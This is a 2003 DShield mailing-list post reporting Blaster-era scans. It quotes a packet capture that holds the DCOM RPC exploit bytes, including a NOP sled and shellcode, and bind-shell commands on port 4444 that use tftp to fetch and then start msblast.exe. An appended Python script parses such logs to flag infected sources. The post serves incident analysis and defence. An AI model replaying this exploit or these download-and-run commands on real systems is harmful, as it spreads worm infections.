[Dshield] UDP 137 Scans

John Sage jsage at finchhaven.com
Tue Aug 12 20:21:41 GMT 2003


Jon, et al:

On Tue, Aug 12, 2003 at 03:21:34PM -0400, Jon R. Kibler wrote:
> Greetings:
> 
> We are getting whacked pretty good by 137/UDP scans -- a different
> block of 3 to 7 IPs in rapid succession every few minutes. Presently,
> these scans are outnumbering 135/TCP scans by a factor of 2 or 3 to
> 1.
> 
> These are being blocked on our DSL router and I have no easy way of
> doing a packet capture or submitting logs.
> 
> This all started about noon EDT.
> 
> Any idea what is going on here?

I am starting to see UDP:137 probes within the TCP:135/TCP:4444
probes; i.e. from the same host, at the same time.

Viz:

input: snort.log.1060670467
filter: ip and ( src host 12.82.144.224 )
#
T 2003/08/12 00:18:34.363541 12.82.144.224:2814 -> 12.82.133.139:135 [S]
#
T 2003/08/12 00:18:34.633590 12.82.144.224:2814 -> 12.82.133.139:135 [A]
#
T 2003/08/12 00:18:36.103736 12.82.144.224:2814 -> 12.82.133.139:135 [AP]
  05 00 0b 03 10 00 00 00    48 00 00 00 7f 00 00 00    ........H.......
  d0 16 d0 16 00 00 00 00    01 00 00 00 01 00 01 00    ................
  a0 01 00 00 00 00 00 00    c0 00 00 00 00 00 00 46    ...............F
  00 00 00 00 04 5d 88 8a    eb 1c c9 11 9f e8 08 00    .....]..........
  2b 10 48 60 02 00 00 00                               +.H`....        
#
T 2003/08/12 00:18:36.673951 12.82.144.224:2814 -> 12.82.133.139:135 [A]
  05 00 00 03 10 00 00 00    a8 06 00 00 e5 00 00 00    ................
  90 06 00 00 01 00 04 00    05 00 06 00 01 00 00 00    ................
  00 00 00 00 32 24 58 fd    cc 45 64 49 b0 70 dd ae    ....2$X..EdI.p..
  74 2c 96 d2 60 5e 0d 00    01 00 00 00 00 00 00 00    t,..`^..........
  70 5e 0d 00 02 00 00 00    7c 5e 0d 00 00 00 00 00    p^......|^......
  10 00 00 00 80 96 f1 f1    2a 4d ce 11 a6 6a 00 20    ........*M...j. 
  af 6e 72 f4 0c 00 00 00    4d 41 52 42 01 00 00 00    .nr.....MARB....
  00 00 00 00 0d f0 ad ba    00 00 00 00 a8 f4 0b 00    ................
  20 06 00 00 20 06 00 00    4d 45 4f 57 04 00 00 00     ... ...MEOW....
  a2 01 00 00 00 00 00 00    c0 00 00 00 00 00 00 46    ...............F
  38 03 00 00 00 00 00 00    c0 00 00 00 00 00 00 46    8..............F
  00 00 00 00 f0 05 00 00    e8 05 00 00 00 00 00 00    ................
  01 10 08 00 cc cc cc cc    c8 00 00 00 4d 45 4f 57    ............MEOW
  e8 05 00 00 d8 00 00 00    00 00 00 00 02 00 00 00    ................
  07 00 00 00 00 00 00 00    00 00 00 00 00 00 00 00    ................
  00 00 00 00 c4 28 cd 00    64 29 cd 00 00 00 00 00    .....(..d)......
  07 00 00 00 b9 01 00 00    00 00 00 00 c0 00 00 00    ................
  00 00 00 46 ab 01 00 00    00 00 00 00 c0 00 00 00    ...F............
  00 00 00 46 a5 01 00 00    00 00 00 00 c0 00 00 00    ...F............
  00 00 00 46 a6 01 00 00    00 00 00 00 c0 00 00 00    ...F............
  00 00 00 46 a4 01 00 00    00 00 00 00 c0 00 00 00    ...F............
  00 00 00 46 ad 01 00 00    00 00 00 00 c0 00 00 00    ...F............
  00 00 00 46 aa 01 00 00    00 00 00 00 c0 00 00 00    ...F............
  00 00 00 46 07 00 00 00    60 00 00 00 58 00 00 00    ...F....`...X...
  90 00 00 00 40 00 00 00    20 00 00 00 38 03 00 00    ....@... ...8...
  30 00 00 00 01 00 00 00    01 10 08 00 cc cc cc cc    0...............
  50 00 00 00 4f b6 88 20    ff ff ff ff 00 00 00 00    P...O.. ........
  00 00 00 00 00 00 00 00    00 00 00 00 00 00 00 00    ................
  00 00 00 00 00 00 00 00    00 00 00 00 00 00 00 00    ................
  00 00 00 00 00 00 00 00    00 00 00 00 00 00 00 00    ................
  00 00 00 00 00 00 00 00    00 00 00 00 00 00 00 00    ................
  00 00 00 00 00 00 00 00    01 10 08 00 cc cc cc cc    ................
  48 00 00 00 07 00 66 00    06 09 02 00 00 00 00 00    H.....f.........
  c0 00 00 00 00 00 00 46    10 00 00 00 00 00 00 00    .......F........
  00 00 00 00 01 00 00 00    00 00 00 00 78 19 0c 00    ............x...
  58 00 00 00 05 00 06 00    01 00 00 00 70 d8 98 93    X...........p...
  98 4f d2 11 a9 3d be 57    b2 00 00 00 32 00 31 00    .O...=.W....2.1.
  01 10 08 00 cc cc cc cc    80 00 00 00 0d f0 ad ba    ................
  00 00 00 00 00 00 00 00    00 00 00 00 00 00 00 00    ................
  18 43 14 00 00 00 00 00    60 00 00 00 60 00 00 00    .C......`...`...
  4d 45 4f 57 04 00 00 00    c0 01 00 00 00 00 00 00    MEOW............
  c0 00 00 00 00 00 00 46    3b 03 00 00 00 00 00 00    .......F;.......
  c0 00 00 00 00 00 00 46    00 00 00 00 30 00 00 00    .......F....0...
  01 00 01 00 81 c5 17 03    80 0e e9 4a 99 99 f1 8a    ...........J....
  50 6f 7a 85 02 00 00 00    00 00 00 00 00 00 00 00    Poz.............
  00 00 00 00 00 00 00 00    00 00 00 00 01 00 00 00    ................
  01 10 08 00 cc cc cc cc    30 00 00 00 78 00 6e 00    ........0...x.n.
  00 00 00 00 d8 da 0d 00    00 00 00 00 00 00 00 00    ................
  20 2f 0c 00 00 00 00 00    00 00 00 00 03 00 00 00     /..............
  00 00 00 00 03 00 00 00    46 00 58 00 00 00 00 00    ........F.X.....
  01 10 08 00 cc cc cc cc    10 00 00 00 30 00 2e 00    ............0...
  00 00 00 00 00 00 00 00    00 00 00 00 00 00 00 00    ................
  01 10 08 00 cc cc cc cc    68 00 00 00 0e 00 ff ff    ........h.......
  68 8b 0b 00 02 00 00 00    00 00 00 00 00 00 00 00    h...............
  86 01 00 00 00 00 00 00    86 01 00 00 5c 00 5c 00    ............\.\.
  46 00 58 00 4e 00 42 00    46 00 58 00 46 00 58 00    F.X.N.B.F.X.F.X.
  4e 00 42 00 46 00 58 00    46 00 58 00 46 00 58 00    N.B.F.X.F.X.F.X.
  46 00 58 00 9f 75 18 00    cc e0 fd 7f cc e0 fd 7f    F.X..u..........
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 eb    19 5e 31 c9 81 e9 89 ff    .........^1.....
  ff ff 81 36 80 bf 32 94    81 ee fc ff ff ff e2 f2    ...6..2.........
  eb 05 e8 e2 ff ff ff 03    53 06 1f 74 57 75 95 80    ........S..tWu..
  bf bb 92 7f 89 5a 1a ce    b1 de 7c e1 be 32 94 09    .....Z....|..2..
  f9 3a 6b b6 d7 9f 4d 85    71 da c6 81 bf 32 1d c6    .:k...M.q....2..
  b3 5a f8 ec bf 32 fc b3    8d 1c f0 e8 c8 41 a6 df    .Z...2.......A..
  eb cd c2 88 36 74 90 7f    89 5a e6 7e 0c 24 7c ad    ....6t...Z.~.$|.
  be 32 94 09 f9 22 6b b6    d7 4c 4c 62 cc da 8a 81    .2..."k..LLb....
  bf 32 1d c6 ab cd e2 84    d7 f9 79 7c 84 da 9a 81    .2........y|....
  bf 32 1d c6 a7 cd e2 84    d7 eb 9d 75 12 da 6a 80    .2.........u..j.
  bf 32 1d c6 a3 cd e2 84    d7 96 8e f0 78 da 7a 80    .2..........x.z.
  bf 32 1d c6 9f cd e2 84    d7 96 39 ae 56 da 4a 80    .2........9.V.J.
  bf 32 1d c6 9b cd e2 84    d7 d7 dd 06 f6 da 5a 80    .2............Z.
  bf 32 1d c6 97 cd e2 84    d7 d5 ed 46 c6 da 2a 80    .2.........F..*.
  bf 32 1d c6 93 01 6b 01    53 a2 95 80 bf 66 fc 81    .2....k.S....f..
  be 32 94 7f e9 2a c4 d0    ef 62 d4 d0 ff 62 6b d6    .2...*...b...bk.
  a3 b9 4c d7 e8 5a 96 80    ae 6e 1f 4c d5 24 c5 d3    ..L..Z...n.L.$..
  40 64 b4 d7 ec cd c2 a4    e8 63 c7 7f e9 1a 1f 50    @d.......c.....P
  d7 57 ec e5 bf 5a f7 ed    db 1c 1d e6 8f b1 78 d4    .W...Z........x.
  32 0e b0 b3 7f 01 5d 03    7e 27 3f 62 42 f4 d0 a4    2.....].~'?bB...
  af 76 6a c4 9b 0f 1d d4    9b 7a 1d d4 9b 7e 1d d4    .vj......z...~..
  9b 62 19 c4 9b 22 c0 d0    ee 63 c5 ea be 63 c5 7f    .b..."...c...c..
  c9 02 c5 7f e9 22 1f 4c    d5 cd 6b b1 40 64 98 0b    .....".L..k.@d..
  77 65 6b d6                                           wek.            
#
T 2003/08/12 00:18:36.753808 12.82.144.224:2814 -> 12.82.133.139:135 [AP]
  93 cd c2 94 ea 64 f0 21    8f 32 94 80 3a f2 ec 8c    .....d.!.2..:...
  34 72 98 0b cf 2e 39 0b    d7 3a 7f 89 34 72 a0 0b    4r....9..:..4r..
  17 8a 94 80 bf b9 51 de    e2 f0 90 80 ec 67 c2 d7    ......Q......g..
  34 5e b0 98 34 77 a8 0b    eb 37 ec 83 6a b9 de 98    4^..4w...7..j...
  34 68 b4 83 62 d1 a6 c9    34 06 1f 83 4a 01 6b 7c    4h..b...4...J.k|
  8c f2 38 ba 7b 46 93 41    70 3f 97 78 54 c0 af fc    ..8.{F.Ap?.xT...
  9b 26 e1 61 34 68 b0 83    62 54 1f 8c f4 b9 ce 9c    .&.a4h..bT......
  bc ef 1f 84 34 31 51 6b    bd 01 54 0b 6a 6d ca dd    ....41Qk..T.jm..
  e4 f0 90 80 2f a2 04 00    5c 00 43 00 24 00 5c 00    ..../...\.C.$.\.
  31 00 32 00 33 00 34 00    35 00 36 00 31 00 31 00    1.2.3.4.5.6.1.1.
  31 00 31 00 31 00 31 00    31 00 31 00 31 00 31 00    1.1.1.1.1.1.1.1.
  31 00 31 00 31 00 31 00    31 00 2e 00 64 00 6f 00    1.1.1.1.1...d.o.
  63 00 00 00 01 10 08 00    cc cc cc cc 20 00 00 00    c........... ...
  30 00 2d 00 00 00 00 00    88 2a 0c 00 02 00 00 00    0.-......*......
  01 00 00 00 28 8c 0c 00    01 00 00 00 07 00 00 00    ....(...........
  00 00 00 00                                           ....            
#
T 2003/08/12 00:18:36.763800 12.82.144.224:2814 -> 12.82.133.139:135 [AF]
#
T 2003/08/12 00:18:36.763880 12.82.144.224:2814 -> 12.82.133.139:135 [A]
#
T 2003/08/12 00:18:36.773806 12.82.144.224:2820 -> 12.82.133.139:4444 [S]
#
T 2003/08/12 00:18:37.033846 12.82.144.224:2820 -> 12.82.133.139:4444 [A]
#
T 2003/08/12 00:18:37.613885 12.82.144.224:2820 -> 12.82.133.139:4444 [AP]
  74 66 74 70 20 2d 69 20    31 32 2e 38 32 2e 31 34    tftp -i 12.82.14
  34 2e 32 32 34 20 47 45    54 20 6d 73 62 6c 61 73    4.224 GET msblas
  74 2e 65 78 65 0a                                     t.exe.          
#
T 2003/08/12 00:18:38.173954 12.82.144.224:2820 -> 12.82.133.139:4444 [A]
#
U 2003/08/12 00:18:41.854306 12.82.144.224:137 -> 12.82.133.139:137
  80 de 00 00 00 01 00 00    00 00 00 00 20 43 4b 41    ............ CKA
  41 41 41 41 41 41 41 41    41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
  41 41 41 41 41 41 41 41    41 41 41 41 41 00 00 21    AAAAAAAAAAAAA..!
  00 01                                                 ..              
#
U 2003/08/12 00:18:43.374460 12.82.144.224:137 -> 12.82.133.139:137
  80 df 00 00 00 01 00 00    00 00 00 00 20 43 4b 41    ............ CKA
  41 41 41 41 41 41 41 41    41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
  41 41 41 41 41 41 41 41    41 41 41 41 41 00 00 21    AAAAAAAAAAAAA..!
  00 01                                                 ..              
#
U 2003/08/12 00:18:44.844605 12.82.144.224:137 -> 12.82.133.139:137
  80 e0 00 00 00 01 00 00    00 00 00 00 20 43 4b 41    ............ CKA
  41 41 41 41 41 41 41 41    41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
  41 41 41 41 41 41 41 41    41 41 41 41 41 00 00 21    AAAAAAAAAAAAA..!
  00 01                                                 ..              
#
U 2003/08/12 00:18:50.845219 12.82.144.224:137 -> 12.82.133.139:137
  80 e4 00 00 00 01 00 00    00 00 00 00 20 43 4b 41    ............ CKA
  41 41 41 41 41 41 41 41    41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
  41 41 41 41 41 41 41 41    41 41 41 41 41 00 00 21    AAAAAAAAAAAAA..!
  00 01                                                 ..              
#
U 2003/08/12 00:18:52.335378 12.82.144.224:137 -> 12.82.133.139:137
  80 e5 00 00 00 01 00 00    00 00 00 00 20 43 4b 41    ............ CKA
  41 41 41 41 41 41 41 41    41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
  41 41 41 41 41 41 41 41    41 41 41 41 41 00 00 21    AAAAAAAAAAAAA..!
  00 01                                                 ..              
#
U 2003/08/12 00:18:53.825533 12.82.144.224:137 -> 12.82.133.139:137
  80 e6 00 00 00 01 00 00    00 00 00 00 20 43 4b 41    ............ CKA
  41 41 41 41 41 41 41 41    41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
  41 41 41 41 41 41 41 41    41 41 41 41 41 00 00 21    AAAAAAAAAAAAA..!
  00 01                                                 ..              
#
T 2003/08/12 00:18:58.115980 12.82.144.224:2820 -> 12.82.133.139:4444 [AP]
  73 74 61 72 74 20 6d 73    62 6c 61 73 74 2e 65 78    start msblast.ex
  65 0a                                                 e.              
exit



- John
-- 
"Obviously, we do not want to leave zombies around."
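
Added example (not part of John's post or any tool he used): a small Python script that reads the packet-log format quoted above (the `T`/`U` header lines plus the indented hex dump lines), flags any source host that hits TCP/135, TCP/4444 and UDP/137 on the same target within a short window, which is the "same host, at the same time" pattern John describes, and decodes the UDP/137 payload as a NetBIOS Name Service query (RFC 1002 first-level name encoding). The sample log reuses the addresses and the UDP/137 payload shown in the post; the 10.0.0.x hosts, the 60-second window and the function names `parse_log`, `find_blaster_sources` and `decode_nbns_query` are my own choices.

```python
"""Correlate TCP/135 + TCP/4444 + UDP/137 from one source and decode the
UDP/137 payload.  Added example; the log format is the one quoted in the post."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

HEADER_RE = re.compile(
    r"^(?P<proto>[TU]) (?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}\.\d+) "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)"
    r"(?: \[(?P<flags>[A-Z]+)\])?$"
)
HEX_COLS = 56  # hex dump occupies columns 0..55, the ASCII rendering follows

# Constructed sample in the post's format. The 12.82.x.x addresses and the
# UDP/137 payload are copied from the post; the 10.0.0.x hosts are invented
# so the correlation has non-matching traffic to ignore.
SAMPLE_LOG = """\
T 2003/08/12 00:18:34.363541 12.82.144.224:2814 -> 12.82.133.139:135 [S]
#
T 2003/08/12 00:18:36.103736 12.82.144.224:2814 -> 12.82.133.139:135 [AP]
#
T 2003/08/12 00:18:36.773806 12.82.144.224:2820 -> 12.82.133.139:4444 [S]
#
U 2003/08/12 00:18:41.854306 12.82.144.224:137 -> 12.82.133.139:137
  80 de 00 00 00 01 00 00    00 00 00 00 20 43 4b 41    ............ CKA
  41 41 41 41 41 41 41 41    41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
  41 41 41 41 41 41 41 41    41 41 41 41 41 00 00 21    AAAAAAAAAAAAA..!
  00 01                                                 ..
#
T 2003/08/12 00:20:01.000000 10.0.0.5:40000 -> 12.82.133.139:80 [S]
#
U 2003/08/12 00:25:00.000000 10.0.0.7:137 -> 12.82.133.139:137
"""

BLASTER_PORTS = {("T", 135), ("T", 4444), ("U", 137)}


def parse_log(text):
    """Return a list of packet dicts; indented hex lines are folded into 'payload'."""
    packets = []
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            pkt = m.groupdict()
            pkt["ts"] = datetime.strptime(pkt["ts"], "%Y/%m/%d %H:%M:%S.%f")
            pkt["sport"], pkt["dport"] = int(pkt["sport"]), int(pkt["dport"])
            pkt["payload"] = bytearray()
            packets.append(pkt)
        elif line.startswith("  ") and packets:
            # Only the hex columns are parsed; the ASCII rendering is dropped.
            tokens = re.findall(r"\b[0-9a-f]{2}\b", line[:HEX_COLS])
            packets[-1]["payload"] += bytes.fromhex("".join(tokens))
    return packets


def find_blaster_sources(packets, window=timedelta(seconds=60)):
    """Map each source that touched all three ports within `window` to the
    first time it was seen on each (proto, dport) pair."""
    first_seen = defaultdict(dict)
    for p in packets:
        key = (p["proto"], p["dport"])
        if key in BLASTER_PORTS:
            first_seen[p["src"]].setdefault(key, p["ts"])
    hits = {}
    for src, seen in first_seen.items():
        times = sorted(seen.values())
        if set(seen) == BLASTER_PORTS and times[-1] - times[0] <= window:
            hits[src] = seen
    return hits


def decode_nbns_query(payload):
    """Decode the first question of a NetBIOS Name Service packet (RFC 1002).
    The 32-byte name carries one nibble per byte, each sent as 'A' + nibble;
    query type 0x21 is NBSTAT (node status), the '*' name is the wildcard."""
    txid = int.from_bytes(payload[0:2], "big")
    qdcount = int.from_bytes(payload[4:6], "big")
    pos = 12
    length = payload[pos]
    encoded = bytes(payload[pos + 1:pos + 1 + length])
    pos += 1 + length
    if length != 32 or payload[pos] != 0:
        raise ValueError("malformed NetBIOS name")
    raw = bytes(((encoded[i] - 0x41) << 4) | (encoded[i + 1] - 0x41)
                for i in range(0, 32, 2))
    qtype = int.from_bytes(payload[pos + 1:pos + 3], "big")
    qclass = int.from_bytes(payload[pos + 3:pos + 5], "big")
    return {
        "txid": txid, "qdcount": qdcount,
        "name": raw[:15].rstrip(b"\x00 ").decode("ascii", "replace"),
        "suffix": raw[15], "qtype": qtype, "qclass": qclass,
        "is_node_status": qtype == 0x21,
    }


if __name__ == "__main__":
    pkts = parse_log(SAMPLE_LOG)
    for src, seen in find_blaster_sources(pkts).items():
        print(src, {f"{p}/{port}": t.time() for (p, port), t in seen.items()})
    udp = next(p for p in pkts if p["proto"] == "U" and p["payload"])
    print(decode_nbns_query(udp["payload"]))
```

The correlation keys on destination port per protocol and the first time each was seen per source, so the order of the three probes does not matter; the window keeps a host that scans 137 today and 135 next week from being lumped together. The decoder shows that the UDP/137 packets in the capture are wildcard node status queries (name `*`, type 0x21, class IN), which is the NetBIOS "who are you" lookup rather than a payload-carrying attack.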